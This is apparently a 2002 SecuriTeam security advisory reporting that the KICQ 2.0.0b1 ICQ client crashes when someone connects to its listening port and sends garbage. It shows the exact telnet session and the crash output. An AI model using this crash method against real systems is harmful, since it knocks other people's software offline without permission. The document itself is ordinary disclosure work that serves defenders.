[UNIX] KICQ Vulnerable to a DoS Attack

From: support@securiteam.com
Date: 02/03/02

From: support@securiteam.com
To: list@securiteam.com
Date: Sun,  3 Feb 2002 21:00:20 +0100 (CET)

- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  KICQ Vulnerable to a DoS Attack

SUMMARY

 <http://sourceforge.net/projects/kicq/> KICQ is an ICQ client,
specifically designed for KDE. KICQ has a simple, clean interface very
similar to the original Windows ICQ client, and includes all of the most
commonly used ICQ features such as messaging, real-time chat, and file
transfer. A security vulnerability in the product allows remote attackers
to cause the program to crash, by simply connecting to it, and sending it
garbage information.

DETAILS

Vulnerable systems:
KICQ version 2.0.0b1 using icqlib 1.0.0

KICQ can be remotely crashed in a very simple way. Just telnet the machine
on which KICQ is running on the port it has bound and feed some garbage.

      $ telnet 10.0.0.1 1030
      Trying 10.0.0.1...
      Connected to 10.0.0.1.
      Escape character is '^]'.
      garbage
      Connection closed by foreign host.

KDE Crash handler window appears and something like this goes in the
console:

      KCrash: crashing.... crashRecursionCounter = 2
      KCrash: Application Name = kicq path = <unknown>

ADDITIONAL INFORMATION

The information has been provided by <mailto:_kiss_@guay.com> _kiss_.

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages

  • [NT] ICQ Client Cross-Application Scripting
    ... Get your security news from a reliable source. ... ICQ Client Cross-Application Scripting ... executes web content may be vulnerable to XAS. ...
    (Securiteam)
  • [NEWS] SalesCart Database Storage Insecurity
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... struct sockaddr_in sin; ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [UNIX] Remote Memory Reading Through TCP/ICMP
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... A security vulnerability in Linux allows remote attackers to cause the ... remote OS to return chucks of "userland" memory. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [UNIX] WebSight Directory System Vulnerable to Cross Site Scripting Bug
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... WebSight Directory System version 0.1 ... When a user submits a new link (for approving by an administrator), ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [UNIX] Sensitive Information Disclosure Vulnerability Found in SIPS (PHP)
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... A security vulnerability in the product allows attackers to get access to ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)